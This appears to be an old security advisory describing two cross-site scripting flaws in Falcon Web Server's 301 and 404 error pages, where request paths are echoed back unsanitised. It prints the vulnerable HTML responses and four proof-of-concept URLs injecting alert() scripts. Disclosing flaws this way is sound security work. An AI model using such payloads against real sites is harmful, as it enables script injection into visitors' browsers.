>From Developer: "Falcon Web Server is running under Windows NT/2000/XP as well as Windows 95/98. It supports ISAPI and WinCGI, and it is a fully functional web server which is capable of running a small / medium scale website of about 50-80 hits per minute. The real advantage of Falcon Web Server is the ability to run on a desktop computer with almost the same functionality as large-scale web servers like MS IIS and Apache." A lack of input sanitation in the error message output of this server makes it susceptible to two cross-site scripting vulnerabilities: * An issue in the way the server handles 301 messages when a file is not found, and the request is not terminated by a slash. Falcon simply adds a slash to the request URI, and sends back a 301 with the following entity: <html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir ecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b r>If nothing happens click the link above.</body></html> * An issue in the way the server handles 404 messages when a file/folder is not found, and the necessary slash has been added (entity below): <html><head><title>HTTP/1.0 404 Not Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not Found</h1><p>Cannot locate the requested file.</body></html> Examples: * 301 Message XSS Closing TITLE tag: http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e Closing A HREF: http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e Closing A tag: http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e * 404 Message XSS http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/ The 301 examples will simply add a slash and pass it on to the browser, which then raises a 404, exploiting that vulnerability as well (although the 301 exploits will cause some useless HTML to be added on) "The reason the mainstream is thought of as a stream is because it is so shallow." - Author Unknown